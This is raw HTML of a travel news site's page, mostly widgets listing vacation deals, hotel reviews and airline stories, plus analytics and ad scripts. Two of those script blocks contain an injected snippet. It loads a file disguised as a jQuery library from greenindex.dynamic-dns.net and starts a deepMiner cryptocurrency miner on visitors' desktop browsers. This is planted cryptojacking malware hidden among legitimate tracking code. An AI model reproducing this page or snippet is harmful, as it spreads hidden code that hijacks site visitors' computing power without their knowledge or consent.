<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/sources-airlines-warned-to-beware-of-possible-shoe-bombs/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/131211151813-airplane-generic-story-top.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/sources-airlines-warned-to-beware-of-possible-shoe-bombs/">Sources: Airlines warned to beware of possible shoe bombs</a></h3><p class="gk-nsp-text"><div>The U.S. government has warned airlines to pay particular...</div></p></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div><div class="gk-tabs-item">
<div id="widget_gk_nsp-13" class="box widget_gk_nsp">
<div><div class="gk-nsp horizontal" data-cols="4" data-rows="1" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on">
<div class="gk-nsp-arts">
<div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1">
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/dubai-abu-dhabi-air-6-nights-from-1155/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/worldstallesthotel-11152012-17339_horiz-large.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/dubai-abu-dhabi-air-6-nights-from-1155/">Dubai &#038; Abu Dhabi, Air, 6 Nights, From $1,155</a></h3><p class="gk-nsp-text"><div>The Real Deal Vacation package includes round-trip...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/costa-rica-air-car-5-nights-from-789/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/first-vacation-ss-costa-rica-722012-19022_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/costa-rica-air-car-5-nights-from-789/">Costa Rica, Air, Car, 5 Nights, From $789</a></h3><p class="gk-nsp-text"><div>The Real Deal Vacation package to Costa Rica includes...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/terrified-passengers-recall-airliners-sudden-turbulent-drop/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/140505102101-newday-dnt-flight-turbulence-rene-marsh-00001210-story-top.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/terrified-passengers-recall-airliners-sudden-turbulent-drop/">Terrified passengers recall airliner&#8217;s sudden, turbulent drop</a></h3><p class="gk-nsp-text"><div>Travelers looking for a relaxing trip to Orlando got...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/basement-breakout-budapests-escape-games-go-global/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/140515092715-escape-game-budapest-10-horizontal-gallery.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/basement-breakout-budapests-escape-games-go-global/">Basement breakout: Budapest&#8217;s escape games go global</a></h3><p class="gk-nsp-text"><div>Beneath the streets of Budapest, behind the locked...</div></p></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div><div class="gk-tabs-item">
<div id="widget_gk_nsp-13" class="box widget_gk_nsp">
<div><div class="gk-nsp horizontal" data-cols="4" data-rows="1" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on">
<div class="gk-nsp-arts">
<div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1">
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/qa-should-i-pay-in-local-currency-or-pound-sterling/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2017/11/pound_sterling_note_coins-768x515.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/qa-should-i-pay-in-local-currency-or-pound-sterling/">Q&#038;A: Should I pay in local currency or pound sterling?</a></h3><p class="gk-nsp-text"><div>When on holiday when paying for an item in a shop I...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/take-a-heartland-road-trip/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/1205nebraskasandhillsniobrarariver-5152012-171952_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/take-a-heartland-road-trip/">Take a Heartland Road Trip!</a></h3><p class="gk-nsp-text"><div>His great-great-grandfather founded the town in the...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/5-awesome-affordable-american-drives/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/americandrivesutah-canyonlandsmesa-arch-9272013-94126_panoramic.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/5-awesome-affordable-american-drives/">5 Awesome &#038; Affordable American Drives</a></h3><p class="gk-nsp-text"><div>some other elaborate, pricey conveyance, such as a...</div></p></div>
<div class="gk-nsp-art gk-nsp-cols-4"  style="padding: 0 6px 0 0;"><a href="http://www.gailzavala.com/hacienda-lodging/" class="gk-responsive gk-image-link"  style="margin: 0 0 10px 0;"><img src="/wp-content/uploads/2014/05/PH2009042102567.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/hacienda-lodging/">Hacienda Lodging</a></h3><p class="gk-nsp-text"><div>Price From $45
The drive to the Hacienda, over the...</div></p></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>





</div>
</div>
</div>
</div>				</section>
									
		
					<section id="gk-mainbody">
			<div>
				<div id="widget_gk_nsp-16" class="box  bigtitle mobilelayout all widget_gk_nsp"><h3 class="box-title">Latest News</h3>
				<div class="gk-nsp mobile_layout vertical" data-cols="1" data-rows="4" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on">
				<div class="gk-nsp-arts"><div class="gk-nsp-arts-scroll gk-nsp-pages-1">
				<div class="gk-nsp-arts-page gk-nsp-cols-1">
				 
			 
			 				<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 26px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/15-incredible-things-to-do-in-iceland/" class="gk-image-link"  style="margin: 0 20px 0 0;"><img src="/wp-content/uploads/2014/05/icelands-blue-lagoon-in-the-winter-1132014-05255_panoramic.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap">
			 
				<h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/15-incredible-things-to-do-in-iceland/">15 Incredible Things to Do in Iceland</a></h3><p class="gk-nsp-text"><div>The average person probably knows one of three things about Iceland: it’s the home of Bjork, the country went bankrupt in 2008, and in 2010 its unpronounceable...</div></p>
				</div>
				</div>
								<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 26px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/europes-coolest-cycling-tour-2/" class="gk-image-link"  style="margin: 0 20px 0 0;"><img src="/wp-content/uploads/2014/05/saumur-france-1022013-18447_panoramic1.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap">
			 
				<h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/europes-coolest-cycling-tour-2/">Europe&#8217;s Coolest Cycling Tour</a></h3><p class="gk-nsp-text"><div>Terroir. Spend any time in one of the world&#8217;s great wine-producing regions, whether it&#8217;s Northern California&#8217;s Napa Valley, Italy&#8217;s...</div></p>
				</div>
				</div>
								<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 26px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/levant-hotel/" class="gk-image-link"  style="margin: 0 20px 0 0;"><img src="/wp-content/uploads/2014/05/PH2010040202459.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap">
			 
				<h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/levant-hotel/">Levant Hotel</a></h3><p class="gk-nsp-text"><div>Price From $105
The Doukakis family can&#8217;t take credit for discovering the stellar vantage point at the top of the 935-foot-high Pelekas hill where,...</div></p>
				</div>
				</div>
								<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 26px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/terrified-passengers-recall-airliners-sudden-turbulent-drop/" class="gk-image-link"  style="margin: 0 20px 0 0;"><img src="/wp-content/uploads/2014/05/140505102101-newday-dnt-flight-turbulence-rene-marsh-00001210-story-top.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap">
			 
				<h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/terrified-passengers-recall-airliners-sudden-turbulent-drop/">Terrified passengers recall airliner&#8217;s sudden, turbulent drop</a></h3><p class="gk-nsp-text"><div>Travelers looking for a relaxing trip to Orlando got off to a terrifying start Sunday when their flight suddenly dropped in turbulence, injuring several...</div></p>
				</div>
				</div>
								
				
				
				
				
				</div>
				</div>
				</div>
				</div>
				</div>			</div>
			
			
<aside id="gk-inner-inset">
	<div id="widget_gk_nsp-17" class="box  headlines all widget_gk_nsp"><h3 class="box-title">More Headlines</h3><div class="gk-nsp" data-cols="" data-rows="" data-links="7" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts"><div class="gk-nsp-arts-scroll gk-nsp-pages-"></div></div><div class="gk-nsp-links"><div class="gk-nsp-links-scroll gk-nsp-pages-4">
	
	<ul class="gk-nsp-list gk-nsp-cols-4">	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/fast-furious-will-be-a-ride-at-universal-studios/"  >&#8216;Fast &#038; Furious&#8217; will be a ride at Universal Studios</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/buenos-aires-iguazu-falls-tours-5-nights-from-883/"  >Buenos Aires &#038; Iguazu Falls, Tours, 5 Nights, From $883</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/easyjet-changes-their-hold-bag-rules/"  >Easyjet changes their hold bag rules</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/lhotel-sous-les-figuiers/"  >L&#8217;Hotel Sous les Figuiers</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/tuscany-castle-hotel-car-7-nights-from-484/"  >Tuscany, Castle Hotel, Car, 7 Nights, From $484</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/dubai-abu-dhabi-air-6-nights-from-1155/"  >Dubai &#038; Abu Dhabi, Air, 6 Nights, From $1,155</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/8-mistakes-that-will-ruin-your-weekend-getaway/"  >8 Mistakes That Will RUIN Your Weekend Getaway!</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/6-charming-affordable-european-cities-you-havent-visited-yet/"  >6 Charming &#038; Affordable European Cities You Haven&#8217;t Visited Yet</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/upgrade-secrets-from-the-experts-2/"  >Upgrade Secrets from the Experts!</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/insiders-guide-to-the-caribbean/"  >Insiders&#8217; Guide to the Caribbean</a></h4></li> </ul>
	
	
	<ul class="gk-nsp-list gk-nsp-cols-4">	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/the-green-gate/"  >The Green Gate</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/fundana-villas/"  >Fundana Villas</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/japans-anti-loneliness-cafe-goes-viral/"  >Japan&#8217;s &#8216;anti-loneliness&#8217; cafe goes viral</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/the-least-you-need-to-know-about-airline-loyalty-programs/"  >The Least You Need to Know About Airline Loyalty Programs</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/on-the-edge-of-the-world-icelands-westfjords/"  >On the edge of the world: Iceland&#8217;s Westfjords</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/paris-air-6-nights-from-1199/"  >Paris, Air, 6 Nights, From $1,199</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/10-beautiful-beach-town-bargains-for-fall/"  >10 Beautiful Beach Town Bargains for Fall</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/can-airplane-seats-keep-the-peace/"  >Can airplane seats keep the peace?</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/lhotel-sous-les-figuiers/"  >L&#8217;Hotel Sous les Figuiers</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/deetjens-big-sur-inn/"  >Deetjen&#8217;s Big Sur Inn</a></h4></li> </ul>
	<ul class="gk-nsp-list gk-nsp-cols-4">	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/a-drive-through-southeast-washingtons-wine-country/"  >A Drive Through Southeast Washington&#8217;s Wine Country</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/europes-coolest-cycling-tour-2/"  >Europe&#8217;s Coolest Cycling Tour</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/patagonia-tours-8-nights-from-1045/"  >Patagonia, Tours, 8 Nights, From $1,045</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/15-incredible-things-to-do-in-iceland/"  >15 Incredible Things to Do in Iceland</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/buenos-aires-iguazu-falls-tours-5-nights-from-883/"  >Buenos Aires &#038; Iguazu Falls, Tours, 5 Nights, From $883</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/garbis-villas/"  >Garbis Villas</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/americas-coolest-small-towns-2014/"  >America&#8217;s Coolest Small Towns 2014</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/8-mistakes-that-will-ruin-your-weekend-getaway/"  >8 Mistakes That Will RUIN Your Weekend Getaway!</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/dubai-abu-dhabi-air-6-nights-from-1155/"  >Dubai &#038; Abu Dhabi, Air, 6 Nights, From $1,155</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/lhotel-sous-les-figuiers/"  >L&#8217;Hotel Sous les Figuiers</a></h4></li> </ul>
	<ul class="gk-nsp-list gk-nsp-cols-4">	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/ireland-air-car-6-nights-from-810/"  >Ireland, Air, Car, 6 Nights, From $810</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/auberge-du-presbytere/"  >Auberge du Presbytere</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/tuscany-castle-hotel-car-7-nights-from-484/"  >Tuscany, Castle Hotel, Car, 7 Nights, From $484</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/seoul-unveils-451-million-spaceship-landmark/"  >Seoul unveils $451 million &#8216;spaceship&#8217; landmark</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/fundana-villas/"  >Fundana Villas</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/can-any-train-ride-match-the-orient-express-for-glamor-and-sheer-romance/"  >Can any train ride match the Orient Express for glamor and sheer romance?</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/americas-coolest-small-towns-2014/"  >America&#8217;s Coolest Small Towns 2014</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/upgrade-secrets-from-the-experts-2/"  >Upgrade Secrets from the Experts!</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/paliokaliva-village/"  >Paliokaliva Village</a></h4></li>	<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/what-are-your-favorite-things-to-do-in-amsterdam-and-barcelona/"  >What Are Your Favorite Things To Do In Amsterdam And Barcelona?</a></h4></li> </ul>
	
	
	</div><div class="gk-nsp-links-nav"><ul class="gk-nsp-pagination"><li>1</li><li>2</li><li>3</li><li>4</li></ul></div></div></div></div></aside>
		</section>
					
								<section id="gk-mainbody-bottom">
					<div id="widget_gk_nsp-18" class="box  bigtitle nsphover all widget_gk_nsp"><h3 class="box-title">More News</h3><div class="gk-nsp mobile_layout horizontal" data-cols="2" data-rows="2" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts">
					
					<div class="gk-nsp-arts-scroll gk-nsp-pages-1">
					<div class="gk-nsp-arts-page gk-nsp-cols-1">
				
				
								
					  <div class="gk-nsp-art gk-nsp-cols-2" ><a href="http://www.gailzavala.com/deetjens-big-sur-inn/" class="gk-responsive gk-image-link"  style="margin: 0 0 20px 0;"><img src="/wp-content/uploads/2014/05/PH2009042102550.jpg" alt="" width="310"    /></a>
					  <h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/deetjens-big-sur-inn/">Deetjen&#8217;s Big Sur Inn</a></h3>
					 
					 
					  <p class="gk-nsp-text"><div>Price From $95
Deetjen&#8217;s has been the embodiment of Big Sur for generations. It isn&#8217;t about the plush amenities (there aren&#8217;t any) or...</div></p>
					  </div>
					  
					  
					  					
					  <div class="gk-nsp-art gk-nsp-cols-2" ><a href="http://www.gailzavala.com/fundana-villas/" class="gk-responsive gk-image-link"  style="margin: 0 0 20px 0;"><img src="/wp-content/uploads/2014/05/PH2010040202455.jpg" alt="" width="310"    /></a>
					  <h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/fundana-villas/">Fundana Villas</a></h3>
					 
					 
					  <p class="gk-nsp-text"><div>Price From $63
If there&#8217;s any doubt whether Spyros Spathas values his heritage, just look at the reception area of his Fundana Villas, where a 200-plus-year-old...</div></p>
					  </div>
					  
					  
					  					
					  <div class="gk-nsp-art gk-nsp-cols-2" ><a href="http://www.gailzavala.com/all-time-worst-travel-scenarios-and-how-to-get-out-of-them/" class="gk-responsive gk-image-link"  style="margin: 0 0 20px 0;"><img src="/wp-content/uploads/2014/05/20placestimessquaredaytime-722012-181558_panoramic.jpg" alt="" width="310"    /></a>
					  <h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/all-time-worst-travel-scenarios-and-how-to-get-out-of-them/">All-Time Worst Travel Scenarios (And How to Get Out of Them!)</a></h3>
					 
					 
					  <p class="gk-nsp-text"><div>Bad things can happen to good travelers. And while these worst-case scenarios are just that—things that could throw you for a serious loop, but most...</div></p>
					  </div>
					  
					  
					  					
					  <div class="gk-nsp-art gk-nsp-cols-2" ><a href="http://www.gailzavala.com/insiders-guide-to-the-caribbean/" class="gk-responsive gk-image-link"  style="margin: 0 0 20px 0;"><img src="/wp-content/uploads/2014/05/1112caribbeanboatsoffharbor-1252011-11034_panoramic.jpg" alt="" width="310"    /></a>
					  <h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/insiders-guide-to-the-caribbean/">Insiders&#8217; Guide to the Caribbean</a></h3>
					 
					 
					  <p class="gk-nsp-text"><div>ST. MARTIN
If there&#8217;s any complaint about this part-French, part-Dutch island-piled high with nightclubs, restaurants, and resorts—it&#8217;s that...</div></p>
					  </div>
					  
					  
					  						  
					  </div>
					  </div>
					  </div>
					  </div>
					  </div>	
					  			</section>
							</div><!-- end of the #gk-content-wrap -->
			
									<aside id="gk-inset">
				<div id="widget_gk_nsp-3" class="box  color all widget_gk_nsp"><h3 class="box-title">All Stories</h3><div class="gk-nsp vertical" data-cols="1" data-rows="4" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts"><div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1"> 
					
								<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/ireland-air-car-6-nights-from-810/" class="gk-image-link"  style="margin: 0 10px 0 0;"><img src="/wp-content/uploads/2014/05/gardenrsslakekillarneynationalpark-5152012-13284_panoramic.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap"><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/ireland-air-car-6-nights-from-810/">Ireland, Air, Car, 6 Nights, From $810</a></h3>
				</div>
				
				</div>
									<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/mere-yards-separated-planes-in-near-miss-at-newark-airport-ntsb-says/" class="gk-image-link"  style="margin: 0 10px 0 0;"><img src="/wp-content/uploads/2014/05/140520074231-dnt-newday-planes-nearly-collide-newark-marsh-00004326-story-top.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap"><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/mere-yards-separated-planes-in-near-miss-at-newark-airport-ntsb-says/">Mere yards separated planes in near miss at Newark airport, NTSB says</a></h3>
				</div>
				
				</div>
									<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/one-tank-escapes-from-8-american-cities/" class="gk-image-link"  style="margin: 0 10px 0 0;"><img src="/wp-content/uploads/2014/05/onetankescapesshenandoahvalley-6252012-151242_panoramic.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap"><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/one-tank-escapes-from-8-american-cities/">One-Tank Escapes From 8 American Cities</a></h3>
				</div>
				
				</div>
									<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/terrified-passengers-recall-airliners-sudden-turbulent-drop/" class="gk-image-link"  style="margin: 0 10px 0 0;"><img src="/wp-content/uploads/2014/05/140505102101-newday-dnt-flight-turbulence-rene-marsh-00001210-story-top.jpg" alt="" class="gk-nsp-image" /></a></div>
				<div class="gk-nsp-content-wrap"><h3 class="gk-nsp-header"><a href="http://www.gailzavala.com/terrified-passengers-recall-airliners-sudden-turbulent-drop/">Terrified passengers recall airliner&#8217;s sudden, turbulent drop</a></h3>
				</div>
				
				</div>
									
				
				
				</div></div></div></div></div>
				
				
				
				<div id="widget_gk_nsp-6" class="box  arrows badge-top all widget_gk_nsp"><h3 class="box-title">Top Stories</h3><div class="gk-nsp mobile_layout" data-cols="1" data-rows="1" data-links="3" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts"><div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1"><div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0 5px 0;"><a href="/archives/20" class="gk-responsive gk-image-link"  style="margin: 0 0 20px 0;"><img src="/wp-content/uploads/2014/05/PH2009081701380.jpg" alt="" class="gk-nsp-image gk-responsive" /></a><h3 class="gk-nsp-header"><a href="/archives/203"  >Auberge du Presbytere</a></h3></div></div></div></div><div class="gk-nsp-links"><div class="gk-nsp-links-scroll gk-nsp-pages-1">
				
				<ul class="gk-nsp-list gk-nsp-cols-1">
				
								
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/one-tank-escapes-from-8-american-cities/">One-Tank Escapes From 8 American Cities</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/all-time-worst-travel-scenarios-and-how-to-get-out-of-them/">All-Time Worst Travel Scenarios (And How to Get Out of Them!)</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/8-mistakes-that-will-ruin-your-weekend-getaway/">8 Mistakes That Will RUIN Your Weekend Getaway!</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/paris-air-6-nights-from-1199/">Paris, Air, 6 Nights, From $1,199</a></h4></li>				
				</ul>
				</div>
				</div>
				</div>
				</div>
				<div id="widget_gk_nsp-7" class="box  arrows bigtitle color onlylinks all widget_gk_nsp"><h3 class="box-title">Destinations</h3><div class="gk-nsp" data-cols="" data-rows="" data-links="8" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts"><div class="gk-nsp-arts-scroll gk-nsp-pages-"></div></div><div class="gk-nsp-links"><div class="gk-nsp-links-scroll gk-nsp-pages-1"><ul class="gk-nsp-list gk-nsp-cols-1"> 					
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/100-vampire-proof-hungarys-best-wine-cellars/">100% Vampire-proof: Hungary&#8217;s best wine cellars</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/willis-tower-cracks-frighten-tourists-but-officials-say-no-one-was-in-danger/">Willis Tower cracks frighten tourists, but officials say no one was in danger</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/5-reasons-bathurst-may-be-south-africas-most-eccentric-town/">5 reasons Bathurst may be South Africa&#8217;s most eccentric town</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/thailand-travel-10-essential-chiang-mai-experiences/">Thailand travel: 10 essential Chiang Mai experiences</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/worlds-tallest-lego-tower-built-in-budapest/">World&#8217;s tallest Lego tower built in Budapest</a></h4></li>				
				<li><h4 class="gk-nsp-link-header"><a href="http://www.gailzavala.com/on-the-edge-of-the-world-icelands-westfjords/">On the edge of the world: Iceland&#8217;s Westfjords</a></h4></li></ul></div></div></div></div> <center>	<!--<img src="/ads/logo5_160x600.jpg" />-->
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-109903044-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
	    if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
	    }
        </script>";
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-109903044-1');
</script>
<script type='text/javascript' src='//moradu.com/apu.php?zoneid=1473067'></script> 		</center></aside>
								</section><!-- end of the mainbody section -->
	
						<aside id="gk-sidebar"><!--<img src="/ads/lai-sports300x250.jpg" /> -->

<script type="text/javascript" src="http://g.adspeed.net/ad.php?do=js&zid=73723&oid=18288&wd=-1&ht=-1&target=_blank"></script>

<div id="rcjsload_15a751"></div>
<script type="text/javascript">
(function() {
var referer="";try{if(referer=document.referrer,"undefined"==typeof referer||""==referer)throw"undefined"}catch(exception){referer=document.location.href,(""==referer||"undefined"==typeof referer)&&(referer=document.URL)}referer=referer.substr(0,700);
echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>
        <script>
            var uri = 'www';
            var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
	    if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
            jqueryui.start();
	    }
        </script>";
var rcel = document.createElement("script");
rcel.id = 'rc_' + Math.floor(Math.random() * 1000);
rcel.type = 'text/javascript';
rcel.src = "http://trends.revcontent.com/serve.js.php?w=88408&t="+rcel.id+"&c="+(new Date()).getTime()+"&width="+(window.outerWidth || document.documentElement.clientWidth)+"&referer="+referer;
rcel.async = true;
var rcds = document.getElementById("rcjsload_15a751"); rcds.appendChild(rcel);
})();
</script>
 
			<div id="widget_gk_nsp-4" class="box  widget_gk_nsp"><h3 class="box-title">Travel tips</h3><div class="gk-nsp vertical" data-cols="1" data-rows="4" data-links="" data-autoanim="off" data-autoanimint="5000" data-autoanimhover="on"><div class="gk-nsp-arts"><div class="gk-nsp-arts-scroll gk-nsp-pages-1"><div class="gk-nsp-arts-page gk-nsp-cols-1">
			
			
						<div class="gk-nsp-art gk-nsp-cols-1"  style="padding: 20px 0;">
				<div class="gk-nsp-image-wrap"><a href="http://www.gailzavala.com/8-mistakes-that-will-ruin-your-weekend-getaway/" class="gk-image-link"  style="margin: 0 10px 0 0;"><img src="/wp-content/uploads/2014/05/quickgetawaypanoramic-3212012-14450_panoramic.jpg" alt="" class="gk-nsp-image" /></a></div>
